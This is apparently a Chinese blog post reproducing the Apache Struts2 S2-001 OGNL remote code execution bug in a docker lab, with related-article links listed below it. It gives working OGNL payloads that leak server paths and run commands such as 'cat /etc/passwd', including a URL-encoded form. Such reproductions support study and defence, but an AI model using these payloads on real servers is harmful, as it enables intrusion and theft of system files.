2. 程式人生 > 其它 >S2-001 遠端程式碼執行漏洞

S2-001 遠端程式碼執行漏洞

阿新 發佈:2022-05-18

原理

參考:http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html

該漏洞因為使用者提交表單資料並且驗證失敗時,後端會將使用者之前提交的引數值使用 OGNL 表示式 %{value} 進行解析,然後重新填充到對應的表單資料中。例如註冊或登入頁面,提交失敗後端一般會預設返回之前提交的資料,由於後端使用 %{value} 對提交的資料執行了一次 OGNL 表示式解析,所以可以直接構造 Payload 進行命令執行

影響版本

Struts 2.0.0 - Struts 2.0.8

環境

執行以下命令啟動s2-001測試環境

docker-compose build
docker-compose up -d

POC && EXP

獲取tomcat執行路徑:

%{"tomcatBinDir{"[email protected]@getProperty("user.dir")+"}"}

獲取Web路徑:

%{#[email protected]@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

執行任意命令(命令加引數:new java.lang.String[]{"cat","/etc/passwd"}):

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

漏洞復現

 檢視靶機ip,訪問8080埠

使用burp抓包然後在username插入payload   ,可顯示。 

備註:這個漏洞利用的payload需要url編碼後才可執行。

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

URL編碼

%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D

相關推薦

S2-001 遠端程式碼執行漏洞

原理 參考:http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html

Apache Struts2 S2-013遠端程式碼執行漏洞復現

墨者學院開的靶場 進入環境 Struts2-013好傢伙,框架直接寫臉上,怕人看不出來= =

S2-009 遠端程式碼執行漏洞

影響版本: 2.1.0 - 2.3.1.1 漏洞詳情:http://struts.apache.org/docs/s2-009.html 測試環境搭建

S2-012 遠端程式碼執行漏洞

影響版本: 2.1.0 - 2.3.13 漏洞詳情:http://struts.apache.org/docs/s2-012.html 測試環境搭建

S2-013/S2-014 遠端程式碼執行漏洞

影響版本: 2.0.0 - 2.3.14.1 漏洞詳情: http://struts.apache.org/docs/s2-013.html http://struts.apache.org/docs/s2-014.html

S2-032 遠端程式碼執行漏洞(CVE-2016-3081)

影響版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3) 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-032

S2-015 遠端程式碼執行漏洞

影響版本: 2.0.0 - 2.3.14.2 漏洞詳情: http://struts.apache.org/docs/s2-015.html 測試環境搭建

S2-046 遠端程式碼執行漏洞(CVE-2017-5638)

影響版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-046

Struts2 S2-059 遠端程式碼執行漏洞(CVE-2019-0230)

Apache Struts框架, 會對某些特定的標籤的屬性值,比如id屬性進行二次解析,所以攻擊者可以傳遞將在呈現標籤屬性時再次解析的OGNL表示式,造成OGNL表示式注入。從而可能造成遠端執行程式碼

S2-057 遠端程式碼執行漏洞(CVE-2018-11776)

影響版本:<=Struts 2.3.34,Struts 2.5.16 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-057

S2-052(CVE-2017-9805) 遠端程式碼執行漏洞復現

0x01 漏洞說明 漏洞編號:CVE-2017-9805(S2-052)影響版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12漏洞詳情:http://struts.apache.org/docs/s2-052.html

Apache Struts2遠端程式碼執行漏洞(S2-015)

Apache Struts2遠端程式碼執行漏洞(S2-015)介紹 Apache Struts 2是用於開發JavaEE Web應用程式的開源Web應用框架。Apache Struts 2.0.0至2.3.14.2版本中存在遠端命令執行漏洞遠端攻擊者可藉助帶有‘${}’和‘%{}’

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現 漏洞介紹 F5 BIG-IP 是美國 F5 公司的一款集成了網路流量管理、應用程式安全管理、負載均衡等功能的應用交付平臺。

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現 漏洞介紹 F5 BIG-IP 是美國 F5 公司的一款集成了網路流量管理、應用程式安全管理、負載均衡等功能的應用交付平臺。

F5 BIG-IP 遠端程式碼執行漏洞復現(CVE-2020-5902)

0x01 漏洞詳情 F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

CVE-2020-0674 IE遠端程式碼執行漏洞

0x00 漏洞描述 該漏洞影響元件為jscript.dll,該動態連結庫是微軟Internet Explorer瀏覽器的Javascript引擎之一,其中IE8及以下使用jscript.dll,IE9及以上預設使用jscript9.dll,但網頁可以通過《script》標籤指定

Joomla-3.4.6遠端程式碼執行漏洞復現

#01 Joomla簡介 Joomla!是一套自由、開放原始碼的內容管理系統,以PHP撰寫,用於釋出內容在全球資訊網與內部網,通常被用來搭建商業網站、個人部落格、資訊管理系統、Web 服務等,還可以進行二次開發以擴充使用範圍。

Jenkins-CI 遠端程式碼執行漏洞復現(CVE-2017-1000353)

0x01 環境 使用vulhub搭建漏洞環境 /vulhub-master/jenkins/CVE-2017-1000353 http://192.168.255.130:8080/

bolt cms V3.7.0 xss和遠端程式碼執行漏洞

本文首發於“合天智匯”公眾號 作者:ordar123 宣告:筆者初衷用於分享與普及網路知識,若讀者因此作出任何危害網路安全行為後果自負,與合天智匯及原作者無關!

Struts2 devMode導致遠端程式碼執行漏洞

轉載自https://blog.csdn.net/qq_29277155/article/details/51959041 簡介 Struts 2具有一個稱為devMode(=開發模式)的設定(可以在struts.properties中將其設定為true或false)。啟用此設定後,Struts 2將提供其他